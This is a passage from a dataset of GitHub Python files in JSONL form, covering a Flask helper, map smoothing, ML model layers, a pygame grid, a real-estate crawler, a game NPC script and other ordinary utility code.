threshold\n","repo_name":"bee-travels/data-generator","sub_path":"src/transactions/transaction_data_gen.py","file_name":"transaction_data_gen.py","file_ext":"py","file_size_in_byte":22702,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"16386722546","text":"from myPackage.models import Student, Subject\nfrom myPackage.models import db\n\ndef create_subjects_for_student(name, subject_names):\n # Check if student already exists\n student = Student.query.filter_by(name=name).first()\n if not student:\n # Create new student\n student = Student(name=name)\n db.session.add(student)\n db.session.commit()\n\n # Create subjects for student\n for subject_name in subject_names:\n subject = Subject.query.filter_by(name=subject_name).first()\n if not subject:\n subject = Subject(name=subject_name)\n db.session.add(subject)\n db.session.commit()\n student.subjects.append(subject)\n db.session.commit()\n\ncreate_subjects_for_student('John', ['Math', 'Science', 'History'])\nstudent = Student.query.filter_by(name='John').first()\nfor subject in student.subjects:\n print(subject.name)\n","repo_name":"MahmoudAbuelhasaan/Flask-laps","sub_path":"add_student_subject.py","file_name":"add_student_subject.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21030197768","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.signal import savgol_filter\nfrom scipy.ndimage import gaussian_filter\n\nMAPSIZE = 4096\n\ndef process_map(mapfile):\n MAPSIZE = 4096\n maxbytes = MAPSIZE*MAPSIZE\n with open(mapfile, 'rb') as f:\n data = f.read()\n start = 1024\n row = []\n mapdata = np.ndarray(shape=(MAPSIZE, MAPSIZE), dtype=int)\n tiledata = np.ndarray(shape=(MAPSIZE, MAPSIZE), dtype=int)\n print(\"Created empty mapdata\")\n for i in range(0,MAPSIZE*MAPSIZE):\n x = i % MAPSIZE\n y = int(i / MAPSIZE)\n part = data[start+i*4 : start+4+(i*4)]\n tile = int.from_bytes(part[0:2], signed=True)\n height = int.from_bytes(part[2:4], signed=True)\n tiledata[x,y] = tile\n mapdata[x,y] = height\n return mapdata, tiledata\n\ndef get_preamble(mapfile):\n with open(mapfile, 'rb') as f:\n data = f.read()\n return data[0:1024]\n\ndef smooth_map(mapdata):\n sigma = [0.8, 0.8]\n smoothdata = gaussian_filter(mapdata, sigma)\n return smoothdata\n\ndef write_map(mapdata, tiledata, preamble, outfile):\n with open(outfile, 'wb') as f:\n f.write(preamble)\n for y in range(0,MAPSIZE):\n print(f'\\r{y+1}/{MAPSIZE}', end='')\n for x in range(0,MAPSIZE):\n tile = int(tiledata[x,y])\n height = int(mapdata[x,y])\n tilebytes = tile.to_bytes(2, 'big', signed=True)\n heightbytes = height.to_bytes(2, 'big', signed=True)\n f.write(tilebytes + heightbytes)\n print()\n\nif __name__ == \"__main__\":\n mapfile1 = sys.argv[1]\n mapfile2 = sys.argv[2]\n preamble = get_preamble(mapfile1)\n mapdata1, tiledata1 = process_map(mapfile1)\n smoothmap1 = smooth_map(mapdata1)\n output1 = write_map(smoothmap1, tiledata1, preamble, \"output/rock_layer.map\")\n mapdata2, tiledata2 = process_map(mapfile2)\n smoothmap2 = smooth_map(mapdata2)\n output2 = write_map(smoothmap2, tiledata2, preamble, \"output/top_layer.map\")\n","repo_name":"kraetzin/wurm-map-smoother","sub_path":"map_smoother/map_smoother.py","file_name":"map_smoother.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37167206576","text":"from django.http import UnreadablePostError\nfrom pylibmc import Error as MemcachedError\n\nEXCLUDED = (\n UnreadablePostError,\n MemcachedError,\n)\n\ndef exclude_useless_errors(record):\n if record.exc_info:\n exc_type, exc_value = record.exc_info[:2]\n for excluded_class in EXCLUDED:\n if isinstance(exc_value, excluded_class):\n return False\n return True\n","repo_name":"henrysher/fedora-infra-ansible","sub_path":"roles/mailman/files/django_fedora.py","file_name":"django_fedora.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"44"} +{"seq_id":"33230905368","text":"# Code adapted from: https://github.com/hmsandager/Normalizing-flow-and-deep-kalman-filter/blob/main/dkf.py\nfrom typing import Tuple\nimport torch\nimport torch.nn as nn\nfrom torchtyping import TensorType\n\nscale_clamper = 1e-4\n\n\nclass LinearCombiner(nn.Module):\n \"\"\"\n Parameterizes `q(z_t | z_{t-1}, x_{t:T})`, which is the basic building block\n of the guide (i.e. the variational distribution). The dependence on `x_{:t}` is\n through the hidden state of the RNN (see the PyTorch module `rnn` below)\n\n Args:\n z_dim (int): num of dims for the latent variable, z\n rnn_dim (int): num of dims for the hidden rnn state from the input vector, x\n \"\"\"\n\n def __init__(self, z_dim: int, rnn_dim: int) -> None:\n super().__init__()\n # initialize the three linear transformations used in the neural network\n self.lin_z_to_hidden = nn.Linear(z_dim, rnn_dim)\n self.lin_hidden_to_loc = nn.Linear(rnn_dim, z_dim)\n self.lin_hidden_to_scale = nn.Linear(rnn_dim, z_dim)\n # initialize the two non-linearities used in the neural network\n self.tanh = nn.Tanh()\n self.softplus = nn.Softplus()\n\n def forward(\n self,\n z_t_1: TensorType[\"batch\", \"latent_dim\"],\n h_rnn: TensorType[\"batch\", \"hidden_dim\"],\n ) -> Tuple[TensorType[\"batch\", \"latent_dim\"], TensorType[\"batch\", \"latent_dim\"]]:\n \"\"\"\n Given the latent z at at a particular time step t-1 as well as the hidden\n state of the RNN `h(x_{:t})` we return the mean and scale vectors that\n parameterize the (diagonal) gaussian distribution `q(z_t | z_{t-1}, x_{:t})`\n\n Args:\n z_t_1 (tensor): latent variable input, (B, D_z)\n h_rnn (tensor): rnn latent variable input, (B, D_h)\n\n Returns:\n loc: output mean for transition function, size=(B, D_z)\n scale: output scale for the transition function, size=(B, D_z)\n \"\"\"\n # combine the rnn hidden state with a transformed version of z_t_1\n h_combined = 0.5 * (self.tanh(self.lin_z_to_hidden(z_t_1)) + h_rnn)\n # use the combined hidden state to compute the mean used to sample z_t\n loc = self.lin_hidden_to_loc(h_combined)\n # use the combined hidden state to compute the scale used to sample z_t\n scale = self.softplus(self.lin_hidden_to_scale(h_combined))\n # return loc, scale which can be fed into Normal\n return loc, scale\n\n\nclass Flattener(nn.Module):\n \"\"\"\n Flatten the input data\n \"\"\"\n\n def __init__(\n self,\n width: int,\n height: int,\n input_channels: int,\n rnn_dim: int,\n flatten_channels: int,\n kernel_size: int,\n ):\n super().__init__()\n padding = int((kernel_size - 1) / 2)\n stride = 2\n self.input_width = width // 2 ** len(flatten_channels)\n self.input_height = height // 2 ** len(flatten_channels)\n self.input_dim = flatten_channels[-1] * self.input_width * self.input_height\n\n # Two-layered convolution with a fully connected layer at last\n self.cnn_to_hidden = nn.Conv2d(\n input_channels, flatten_channels[0], kernel_size, stride, padding, bias=True\n )\n self.cnn_hidden_to_hidden = nn.Conv2d(\n flatten_channels[0],\n flatten_channels[1],\n kernel_size,\n stride,\n padding,\n bias=True,\n )\n self.lin_hidden_to_rnn = nn.Linear(self.input_dim, rnn_dim)\n\n # Non-linearities\n self.relu = nn.ReLU()\n self.softplus = nn.Softplus()\n self.tanh = nn.Tanh()\n\n def forward(\n self, z_t: TensorType[\"batch\", \"n_channels\", \"height\", \"width\"]\n ) -> TensorType[\"batch\", \"hidden_dims\"]:\n \"\"\"\n Return the flattened input to RNN\n \"\"\"\n batch_size = z_t.shape[0]\n h1 = self.relu(self.cnn_to_hidden(z_t))\n h2 = self.relu(self.cnn_hidden_to_hidden(h1)).view(batch_size, -1)\n rnn_input = self.tanh(self.lin_hidden_to_rnn(h2))\n\n return rnn_input\n\n\nclass ConvLSTMCombiner(nn.Module):\n \"\"\"\n Parameterizes `q(z_t | z_{t-1}, x_{t:T})`, which is the basic building block\n of the guide (i.e. the variational distribution). The dependence on `x_{t:T}` is\n through the hidden state of the RNN (see the PyTorch module `rnn` below)\n \"\"\"\n\n def __init__(self, z_channels, rnn_channels, kernel_size):\n super().__init__()\n padding = int((kernel_size - 1) / 2)\n stride = 1\n\n # initialize the three linear transformations used in the neural network\n self.lin_z_to_hidden = nn.Conv2d(\n z_channels, rnn_channels, kernel_size, stride, padding, bias=True\n )\n self.lin_hidden_to_loc = nn.Conv2d(\n rnn_channels, z_channels, kernel_size, stride, padding, bias=True\n )\n self.lin_hidden_to_scale = nn.Conv2d(\n rnn_channels, z_channels, kernel_size, stride, padding, bias=True\n )\n # initialize the two non-linearities used in the neural network\n self.tanh = nn.Tanh()\n self.softplus = nn.Softplus()\n\n def forward(self, z_t_1, h_rnn):\n \"\"\"\n Given the latent z at at a particular time step t-1 as well as the hidden\n state of the RNN `h(x_{t:T})` we return the mean and scale vectors that\n parameterize the (diagonal) gaussian distribution `q(z_t | z_{t-1}, x_{t:T})`\n \"\"\"\n # combine the rnn hidden state with a transformed version of z_t_1\n h_combined = 0.5 * (self.tanh(self.lin_z_to_hidden(z_t_1)) + h_rnn)\n # use the combined hidden state to compute the mean used to sample z_t\n loc = self.lin_hidden_to_loc(h_combined)\n # use the combined hidden state to compute the scale used to sample z_t\n scale = self.softplus(self.lin_hidden_to_scale(h_combined)).clamp(\n min=scale_clamper\n )\n # return loc, scale which can be fed into Normal\n return loc, scale\n","repo_name":"jejjohnson/research_notebook","sub_path":"code/torch/lib/filter/models/layers/combiner.py","file_name":"combiner.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"44"} +{"seq_id":"40775311558","text":"import pygame\nfrom numpy import *\nfrom math import sqrt as s\n\ninp = [1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1]\n\npygame.init()\n\nscreen = pygame.display.set_mode((200, 200), flags=pygame.RESIZABLE)\npygame.display.set_caption('Mars protection')\nwidth, height = pygame.display.get_surface().get_size()\n\nsqr_size = int(height / 3)\nsqrs = 5*3\n\npath = ''\n\nsquare = (\n [pygame.image.load(path + 'images/images/square.png')] * sqrs\n)\n\nsquare_white = pygame.transform.scale(pygame.image.load(path + 'images/images/square.png').convert_alpha(),\n (sqr_size, sqr_size))\nsquare_black = pygame.transform.scale(pygame.image.load(path + 'images/images/square_black.png').convert_alpha(),\n (sqr_size, sqr_size))\n\nsquare_rect = []\n\nlist_sqr = inp\nrighting = False\n\nrunning = True\nwhile running:\n\n screen.fill('gray')\n\n if height > 500:\n screen = pygame.display.set_mode((width, 500), flags=pygame.RESIZABLE)\n square_rect = []\n width, height = pygame.display.get_surface().get_size()\n sqr_size = int(height / 7)\n\n square_white = pygame.transform.scale(pygame.image.load(path + 'images/images/square.png').convert_alpha(),\n (sqr_size, sqr_size))\n square_black = pygame.transform.scale(pygame.image.load(path + 'images/images/square_black.png').convert_alpha(),\n (sqr_size, sqr_size))\n\n mouse = pygame.mouse.get_pos()\n keys = pygame.key.get_pressed()\n\n for i in range(len(square)):\n if inp[i] == 1:\n square[i] = square_black\n else:\n square[i] = square_white\n\n x = (width - (sqr_size * 3)) / 2 - sqr_size\n y = sqr_size\n for quantity in range(len(inp) + 1):\n for high in range(int(5)):\n if quantity == high * 3 + 1 and high != 0:\n y += sqr_size\n x = (width - (sqr_size * 3)) / 2\n if quantity != 0:\n screen.blit(pygame.transform.scale(square[quantity - 1].convert_alpha(), (sqr_size, sqr_size)), (x, y))\n square_rect.append(square[quantity - 1].get_rect(topleft=(x, y)))\n x += sqr_size\n\n if righting:\n for squares in range(len(square)):\n mouse = pygame.mouse.get_pos()\n keys = pygame.key.get_pressed()\n if square_rect[squares].collidepoint(mouse) and pygame.mouse.get_pressed()[0]:\n square[squares] = square_black\n list_sqr[squares] = 1\n else:\n for squares in range(len(square)):\n mouse = pygame.mouse.get_pos()\n keys = pygame.key.get_pressed()\n if square_rect[squares].collidepoint(mouse) and pygame.mouse.get_pressed()[0]:\n square[squares] = square_white\n list_sqr[squares] = 0\n\n pygame.display.update()\n\n keys = pygame.key.get_pressed()\n for event in pygame.event.get():\n if keys[pygame.K_r]:\n righting = True\n if keys[pygame.K_l]:\n righting = False\n if event.type == pygame.QUIT or keys[pygame.K_ESCAPE]:\n running = False\n print(list_sqr)\n pygame.quit()\n","repo_name":"Vlad21islav/neiroNumber","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20993164450","text":"import csv\nimport os.path\nfrom prompt import Prompt\nimport datetime\n\n\nclass Entry(Prompt):\n\n def save(self, new_content):\n # Check if CSV file exists - if not create a new file and write headers\n file_exists = os.path.isfile('logfile.csv')\n with open('logfile.csv', 'a') as csvfile:\n if not file_exists:\n fieldnames = ['Date', 'Task Name', 'Time Spent', 'Notes']\n dict_writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n dict_writer.writeheader()\n writer = csv.writer(csvfile, delimiter=',')\n for entry in new_content:\n writer.writerow(entry)\n\n def get_content(self):\n content = []\n self.prompt(\"\"\"Please enter the date of the task.\n Please use DD/MM/YYYY: \"\"\")\n user_input = input()\n self.clear()\n try:\n task_date = datetime.datetime.strptime(user_input, \"%d/%m/%Y\").date()\n content.append(task_date.strftime('%m/%d/%Y'))\n except ValueError:\n print('That does not seem to be a valid date. Try again.')\n\n self.prompt('Please enter the title of the task. ')\n task_title = input()\n content.append(task_title)\n self.clear()\n\n self.prompt('Time spent (rounded minutes): ')\n time_spent = input()\n content.append(time_spent)\n self.clear()\n\n self.prompt('Notes (optional): ')\n notes = input()\n content.append(notes)\n self.clear()\n\n self.save([content])\n self.prompt('Your entry has been added. Press any key to return to the main menu.')\n input()\n self.clear()\n","repo_name":"maxlvl/techdegree-project-3","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31613209307","text":"from google.cloud import translate\nimport os \n\ndef translate_text(text: str, target_language_code: str) -> translate.Translation:\n client = translate.TranslationServiceClient()\n\n response = client.translate_text(\n parent='projects/' + os.environ['PROJECT_ID'],\n contents=[text],\n target_language_code=target_language_code,\n )\n\n return response.translations[0].translated_text\n\n\nif __name__ == \"__main__\":\n from dotenv import load_dotenv\n load_dotenv()\n print(translate_text('Isso é um teste', 'en'))","repo_name":"vinicius-marques1/gen_ai_teste","sub_path":"traduzir.py","file_name":"traduzir.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3295643695","text":"# -*- coding: utf-8 -*-\n#BEGIN_HEADER\nimport logging\nimport os\nimport uuid\nfrom VariationDataQuery.Utils.vcf_parser import vcf_parser\nfrom VariationDataQuery.Utils.htmlreportutils import htmlreportutils\nfrom installed_clients.KBaseReportClient import KBaseReport\n\n#END_HEADER\n\n\nclass VariationDataQuery:\n '''\n Module Name:\n VariationDataQuery\n\n Module Description:\n A KBase module: VariationDataQuery\n '''\n\n ######## WARNING FOR GEVENT USERS ####### noqa\n # Since asynchronous IO can lead to methods - even the same method -\n # interrupting each other, you must be *very* careful when using global\n # state. A method could easily clobber the state set by another while\n # the latter method is running.\n ######################################### noqa\n VERSION = \"0.0.1\"\n GIT_URL = \"\"\n GIT_COMMIT_HASH = \"\"\n\n #BEGIN_CLASS_HEADER\n #END_CLASS_HEADER\n\n # config contains contents of config file in a hash or None if it couldn't\n # be found\n def __init__(self, config):\n #BEGIN_CONSTRUCTOR\n self.callback_url = os.environ['SDK_CALLBACK_URL']\n self.shared_folder = config['scratch']\n logging.basicConfig(format='%(created)s %(levelname)s: %(message)s',\n level=logging.INFO)\n self.vp = vcf_parser() \n self.hr = htmlreportutils()\n #END_CONSTRUCTOR\n pass\n\n\n def run_VariationDataQuery(self, ctx, params):\n \"\"\"\n This example function accepts any number of parameters and returns results in a KBaseReport\n :param params: instance of mapping from String to unspecified object\n :returns: instance of type \"ReportResults\" -> structure: parameter\n \"report_name\" of String, parameter \"report_ref\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: output\n #BEGIN run_VariationDataQuery\n\n self.vp.validate_params(params)\n outputdir = self.shared_folder + '/' + str(uuid.uuid1())\n os.mkdir(outputdir)\n workspace = params['workspace_name']\n coordinates = params['coordinates']\n\n id = 0\n\n coord_array = coordinates.split(\",\")\n for coord in coord_array:\n contig_id,start,stop = coord.split(\"-\")\n print(contig_id + \"\\t\" + str(start) + \"\\t\" + str(stop))\n sample_info_file = os.path.join(self.shared_folder, \"sample_names\" + str(id) + \".txt\")\n variants_info_file = os.path.join(self.shared_folder, \"data\" + str(id) + \".txt\")\n self.vp.get_variants( contig_id, str(start), str(stop), \"https://appdev.kbase.us/dynserv/b8fedfd6d8a1fc10372bcbad4f152b4b6d85507b.VariationFileServ/shock/a293a557-47b3-4fcc-8bef-d2049ad6368a\", \"https://appdev.kbase.us/dynserv/b8fedfd6d8a1fc10372bcbad4f152b4b6d85507b.VariationFileServ/shock/f19936ff-6f66-4a44-831f-1bfcdc6e88c4\", id)\n variant_file = self.vp.getjson(sample_info_file, variants_info_file, outputdir, id)\n id = id + 1\n\n output = self.hr.create_html_report(self.callback_url, outputdir, workspace)\n \n report = KBaseReport(self.callback_url)\n\n #END run_VariationDataQuery\n\n # At some point might do deeper type checking...\n if not isinstance(output, dict):\n raise ValueError('Method run_VariationDataQuery return value ' +\n 'output is not type dict as required.')\n # return the results\n return [output]\n def status(self, ctx):\n #BEGIN_STATUS\n returnVal = {'state': \"OK\",\n 'message': \"\",\n 'version': self.VERSION,\n 'git_url': self.GIT_URL,\n 'git_commit_hash': self.GIT_COMMIT_HASH}\n #END_STATUS\n return [returnVal]\n","repo_name":"kbasecollaborations/VariationDataQuery","sub_path":"lib/VariationDataQuery/VariationDataQueryImpl.py","file_name":"VariationDataQueryImpl.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5405063860","text":"from sklearn.mixture import GaussianMixture\nfrom sklearn.cluster import KMeans, MiniBatchKMeans\nimport scipy.stats as stats\nimport numpy as np\n\n\nclass GaussianMixtureModel:\n\n def __init__(self, num_of_components=32):\n self.num_of_gaussian_component = num_of_components\n\n # According to research, GMM in speaker recognition\n # work best with diagonal covariance matrix\n self.gmm_model = GaussianMixture(n_components=num_of_components,\n covariance_type=\"diag\")\n\n def fit(self, data):\n # Use K-Mean to estimate GMM component centers\n # kmeans = KMeans(n_clusters=self.num_of_gaussian_component)\n kmeans = MiniBatchKMeans(n_clusters=self.num_of_gaussian_component)\n kmeans.fit(data)\n\n self.gmm_model.means_init = kmeans.cluster_centers_\n\n # Fit data\n self.gmm_model.fit(data)\n\n def adapt(self, data):\n \"\"\"\n Adapting Gaussian components to a specific speaker's data. Use for UBM model\n\n Ref: Speaker Verification Using Adapted Gaussian Mixture Models - D. A. Reynolds et al.\n \"\"\"\n\n # NOTE: Self-convention: L stand for list, D stand for dict, w stand for weighted\n # Key: i - index of component; Value: probability density of each data point with component i\n print(\"Start adapting GMM to data size %s\", str(data.shape))\n T = len(data) # number of data point\n M = len(self.gmm_model.means_) # number of Gaussian components\n\n print(\"Start calculating pdf of %d components with %d data points\", M, T)\n\n pD = np.transpose(self.gmm_model.predict_proba(data)) # Shape: n_components, n_sameple\n\n\n # pD = dict()\n # for i in range(M):\n # mu = self.gmm_model.means_[i]\n # cov = self.gmm_model.covariances_[i]\n #\n # pD[i] = list()\n #\n # for xt in data:\n # # pD[i][t] = gauss_pdf of component i with data point xt\n # pxt = stats.multivariate_normal.pdf(xt, mu, cov)\n # pD[i].append(pxt)\n #\n # logger.debug(\"Finish component %d\", i)\n\n # Weighted probability density of each data point\n # wpL[t] = pdf of GMM with data point xt\n\n print(\"Start calculating weight pdf of %d data points\", T)\n wpL = list()\n for t, xt in enumerate(data):\n\n prob_sum = 0\n for i in range(M):\n prob_sum += pD[i][t] * self.gmm_model.weights_[i]\n\n wpL.append(prob_sum)\n\n # Normalized pdf of component i with data point xt\n # Correspond with formula 7 in the article\n # prD[i][t]= (w_i * p_i(t) / sum (w_j * p_j(t)))\n prD = dict()\n\n print(\"Start normalize weight pdf of %d components with %d data points\", M, T)\n for i in range(M):\n wi = self.gmm_model.weights_[i]\n prD[i] = list()\n\n for t, xt in enumerate(data):\n prD[i].append(pD[i][t] * wi / wpL[t])\n\n nL = dict()\n eL = dict()\n e2L = dict()\n wL_ = list()\n\n for i in range(M):\n print(\"Start adapting parameters of GMM component %d\", i)\n mui = self.gmm_model.means_[i]\n cov = np.diag(self.gmm_model.covariances_[i]) # because GMM store covariance matrix as diagonal vector\n wi = self.gmm_model.weights_[i]\n\n nL[i] = sum(prD[i])\n # in case the total sum of probability too small\n # skip adapting this component\n if nL[i] == 0:\n logger.warn(\"Total sum of probability = 0. Skip this component\")\n wL_.append(wi)\n continue\n\n eL[i] = 1 / nL[i] * np.sum([pD[i][t] * data[t] for t in range(T)], axis=0)\n e2L[i] = (1 / nL[i] * np.sum([pD[i][t] * self.square(data[t]) for t in range(T)], axis=0))\n\n # Use one adaption cofficient for weight, mean and covariance\n r = 16\n alpha = nL[i] / (nL[i] + r)\n\n wi_ = alpha * nL[i] / T + (1 - alpha) * wi\n\n mui_ = alpha * eL[i] + (1 - alpha) * mui\n\n # Disable covariance adapting since new covariance has negative element in diagonal\n # cov_ = alpha * e2L[i] + (1 - alpha) * (cov + self.square(mui)) - self.square(mui_)\n\n print(\"Old mean\", mui)\n print(\"New mean\", mui_)\n print(\"Old weight\", wi)\n print(\"New weight\", wi_)\n\n self.gmm_model.means_[i] = mui_\n # self.gmm_model.covariances_[i] = np.diag(cov_) # only take diagonal matrix\n\n wL_.append(wi_)\n\n total_w = sum(wL_)\n\n for i in range(M):\n # Normalize weight to ensure total weight sum = 1\n self.gmm_model.weights_[i] = wL_[i] / total_w\n\n def square(self, vector):\n return np.outer(vector, vector)\n\n def log_proba(self, data):\n return self.gmm_model.score(data)\n","repo_name":"linhndt/spoken_language_classification","sub_path":"speaker_model/gmm_model.py","file_name":"gmm_model.py","file_ext":"py","file_size_in_byte":4998,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"9593872501","text":"import win32file\nimport win32api\nimport subprocess\nimport sys\nfrom time import sleep\nfrom .utils import get_repo_bin_path\nfrom .common import hand_bin_name, pipe_name\n\nclass Hand:\n\n def __init__(self) -> None:\n self._start_server()\n sleep(0.1)\n self._connect_to_pipe()\n sleep(0.1)\n\n def __del__(self):\n sleep(0.1)\n self._disconnect_to_pipe()\n self._kill_server()\n\n\n def click(self, duty_ratio: float):\n self._send_message(f'clicking {duty_ratio:.2f}')\n \n def stop(self):\n self._send_message('idle')\n\n def _start_server(self):\n print(str(get_repo_bin_path() / hand_bin_name))\n self.server_process = subprocess.Popen(\n [str(get_repo_bin_path() / hand_bin_name)], \n stdout=sys.stdout\n )\n\n def _kill_server(self):\n self.server_process.kill()\n\n def _connect_to_pipe(self):\n self.pipe_handle = win32file.CreateFile(\n pipe_name,\n win32file.GENERIC_WRITE,\n win32file.FILE_SHARE_READ,\n None,\n win32file.OPEN_EXISTING,\n win32file.FILE_ATTRIBUTE_NORMAL,\n None\n )\n\n if self.pipe_handle is None:\n raise RuntimeError('Failed to connect to pipe, please check whether pipe is created.')\n\n def _disconnect_to_pipe(self):\n win32api.CloseHandle(self.pipe_handle)\n\n def _send_message(self, message: str) -> bool:\n error_code, num_bytes_written = win32file.WriteFile(self.pipe_handle, message.encode())\n if error_code != 0 or num_bytes_written == 0:\n return False\n else:\n return True","repo_name":"Lixian-Zhang/StardrewAutoFishing","sub_path":"src/autofishing/Hand.py","file_name":"Hand.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28225304858","text":"import urllib.parse\nfrom Crawler import Crawler\nfrom RealEstate import RealEstate\n\n\nclass AruodasCrawler(Crawler):\n def set_data_containers(self):\n self.containers = self.page_soup.findAll(\"tr\", {\"class\": \"list-row\"})\n\n def crawl_data(self):\n real_estates = []\n for container in self.containers:\n if not container.img:\n continue\n\n title = container.img[\"alt\"]\n image_url = container.img[\"src\"]\n address_container = container.find(\"td\", {\"class\": \"list-adress\"})\n link = address_container.a[\"href\"]\n\n area = container.find(\"td\", {\"class\": \"list-AreaOverall\"}).text.strip()\n building_status = None\n building_status_value_container = container.find(\"td\", {\"class\": \"list-HouseStates\"});\n if building_status_value_container:\n building_status = building_status_value_container.text.strip()\n\n price_container = address_container.find(\"div\", {\"class\": \"price\"})\n price = price_container.find(\"span\", {\"class\": \"list-item-price\"}).text.strip()\n crawler_id = self.options[\"id\"]\n\n real_estates.append(\n RealEstate(title, link, price, area, building_status, image_url, crawler_id).to_json())\n\n return real_estates\n\n def create_url(self):\n options = self.options\n real_estate_type = options[\"realEstateType\"]\n price_min = options[\"priceMin\"]\n price_max = options[\"priceMax\"]\n area_min = options[\"areaMin\"]\n area_max = options[\"areaMax\"]\n rooms_min = options[\"roomsMin\"]\n rooms_max = options[\"roomsMax\"]\n\n params = {\n \"FOrder\": \"AddDate\",\n \"FRegionArea\": 462,\n }\n if price_min:\n params[\"FPriceMin\"] = price_min\n\n if price_max:\n params[\"FPriceMax\"] = price_max\n\n if area_min:\n params[\"FAreaOverAllMin\"] = area_min\n\n if area_max:\n params[\"FAreaOverAllMax\"] = area_max\n\n if rooms_min:\n params[\"FRoomNumMin\"] = rooms_min\n\n if rooms_max:\n params[\"FRoomNumMax\"] = rooms_max\n\n if real_estate_type == \"house\":\n url = 'https://www.aruodas.lt/namai/vilniuje/?'\n else:\n url = 'https://www.aruodas.lt/butai/vilniuje/?'\n\n print(url + urllib.parse.urlencode(params))\n return url + urllib.parse.urlencode(params)\n","repo_name":"mindaugas16/mine-house","sub_path":"crawler/crawlers/AruodasCrawler.py","file_name":"AruodasCrawler.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"26758195089","text":"# Configuration settings for the flask application\n# Vyyom Kelkar\n\n# Enable forms and entries\nWTF_CSRF_ENABLED = True\n\nSECRET_KEY = 'youwillneverguess'\n\n# Declare the database for the application, the folder for the migrations and settings for tracking modifications\nSQLALCHEMY_DATABASE_URI = 'sqlite:///db/app.db'\nSQLALCHEMY_MIGRATE_REPO = 'db_repository'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n","repo_name":"Vyyom-Kelkar/Profile-Password-Management-System","sub_path":"app/submitFiles/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8548829196","text":"\"\"\" 11004332: Lanemone \"\"\"\nfrom npc_api import Option, Script\nimport random\n\n\nclass Main(Script):\n def first(self) -> int:\n return random.choice([10, 30])\n\n def select(self) -> int:\n return random.choice([0, 20])\n\n def __0(self, pick: int) -> int:\n # $script:1102172107011635$\n # - Hm...\n return None # TODO\n\n def __20(self, pick: int) -> int:\n # $script:1010140307011563$\n # - Mm?\n return None # TODO\n\n def __10(self, pick: int) -> int:\n # $script:1102172107011636$\n # - I sense something powerful. Something... wrong.\n return -1\n\n def __30(self, pick: int) -> int:\n if self.index == 0:\n # $script:1010140307011564$\n # - Hey, you!\n return 30\n elif self.index == 1:\n # $script:1010140307011565$\n # - Long time no see.\n return 30\n elif self.index == 2:\n # $script:1010140307011566$\n # - I wasn't expecting to run into you here.\n if pick == 0:\n # $script:1010140307011567$\n # - What brings you here?\n return 40\n return -1\n return -1\n\n def __40(self, pick: int) -> int:\n if self.index == 0:\n # $script:1010140307011568$\n # - Well, that geezer—erm, Mr. $npcName:11004233[gender:0]$ sent me here.\n return 40\n elif self.index == 1:\n # $script:1010140307011569$\n # - The Frontier Foundation caught wind of something quite unexpected here on this continent that warranted investigation.\n return 40\n elif self.index == 2:\n # $script:1010140307011570$\n # - Traces of lapenta energy!\n return 40\n elif self.index == 3:\n # $script:1010140307011571$\n # - But I suppose you already knew that.\n return 40\n elif self.index == 4:\n # $script:1010140307011572$\n # - You should be careful. There's no telling what kinds of dangers lurk in this land.\n if pick == 0:\n # $script:0111232407012699$\n # - You too. Take care of yourself.\n return 50\n return -1\n return -1\n\n def __50(self, pick: int) -> int:\n # $script:0111232407012700$\n # - Oh, you don't have to worry about me.\n return -1\n\n def button(self) -> Option:\n if (self.state, self.index) == (10, 0):\n return Option.CLOSE\n elif (self.state, self.index) == (30, 0):\n return Option.NEXT\n elif (self.state, self.index) == (30, 1):\n return Option.NEXT\n elif (self.state, self.index) == (30, 2):\n return Option.SELECTABLE_DISTRACTOR\n elif (self.state, self.index) == (40, 0):\n return Option.NEXT\n elif (self.state, self.index) == (40, 1):\n return Option.NEXT\n elif (self.state, self.index) == (40, 2):\n return Option.NEXT\n elif (self.state, self.index) == (40, 3):\n return Option.NEXT\n elif (self.state, self.index) == (40, 4):\n return Option.SELECTABLE_DISTRACTOR\n elif (self.state, self.index) == (50, 0):\n return Option.CLOSE\n return Option.NONE\n","repo_name":"kOchirasu/Maple2-GeneratedScripts","sub_path":"Npc/11004332.py","file_name":"11004332.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16945739519","text":"import os\nfrom typing import Dict\n\nimport pytest\nimport tenacity\nfrom pytest import CollectReport, StashKey\n\n# 